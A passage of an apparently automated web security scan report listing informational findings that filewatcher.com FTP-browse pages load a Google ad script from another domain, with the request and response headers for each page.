User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8+pElFiXhwzzdHiIjV0PoQ"
Content-Length: 13604
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 639
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.8/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.868. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "hTXXuCiXgqFim2lrW6ulng"
Content-Length: 9304
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 650
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.8/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.869. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages/sparc64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wT3dNJQ3CSAujL2FeS6U1g"
Content-Length: 34040
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 653
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.8/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.870. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.9.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com/pub/OpenBSD/3.9.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.9.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Kx2qKEpHHvNwKsUgJ5M/OQ"
Content-Length: 14818
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 650
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.9/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.871. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "myQbMTp/SRumW2oDrRa4Qw"
Content-Length: 9304
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 659
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.9/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.872. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages/vax.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages/vax.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages/vax.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "iv2kobMvJ17wHxVHzJbnyA"
Content-Length: 20042
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 659
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.9/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.873. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/4.0.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com/pub/OpenBSD/4.0.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/4.0.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "E3ef1lIQXTn9Big0YazmQA"
Content-Length: 15178
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 638
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/4.0/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.874. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "zWRZALaeNzdBUORmsoTOjg"
Content-Length: 9304
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 635
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/4.0/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.875. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages/sparc64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "B6HUXtBWvDFetsyOA0b9ug"
Content-Length: 29378
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 638
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/4.0/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.876. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nyc.openbsd.org.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "C/mTN9KWA8reI74M+yIqvA"
Content-Length: 6154
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 652
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/ - FTP Brows
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.877. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nyc.openbsd.org/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "CBFSAOViI9xEC89NgJVG7w"
Content-Length: 5983
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 654
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/ - FTP B
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.878. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "DXVB4wk4jeHDl6oZ1LrRAg"
Content-Length: 8790
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 655
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.879. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7kML8SMhH4+AxHHRDQgGTw"
Content-Length: 11946
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 655
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.880. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "G81HUNRzhla4XbvkNzfXNA"
Content-Length: 9722
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 656
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.881. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/alpha.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/alpha.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/alpha.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "i/69s8X3Kd4cUD5r72JIRA"
Content-Length: 22975
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 661
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.882. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/i386.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GA8dazIf97WhHNs06w41TA"
Content-Length: 26223
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 681
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.883. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/mips64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/mips64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/mips64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QBxYLy581vEfebjWL+acUQ"
Content-Length: 23731
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 661
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/OpenBSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.884. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/powerpc.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD/snapshots/packages/powerpc.0.0.html

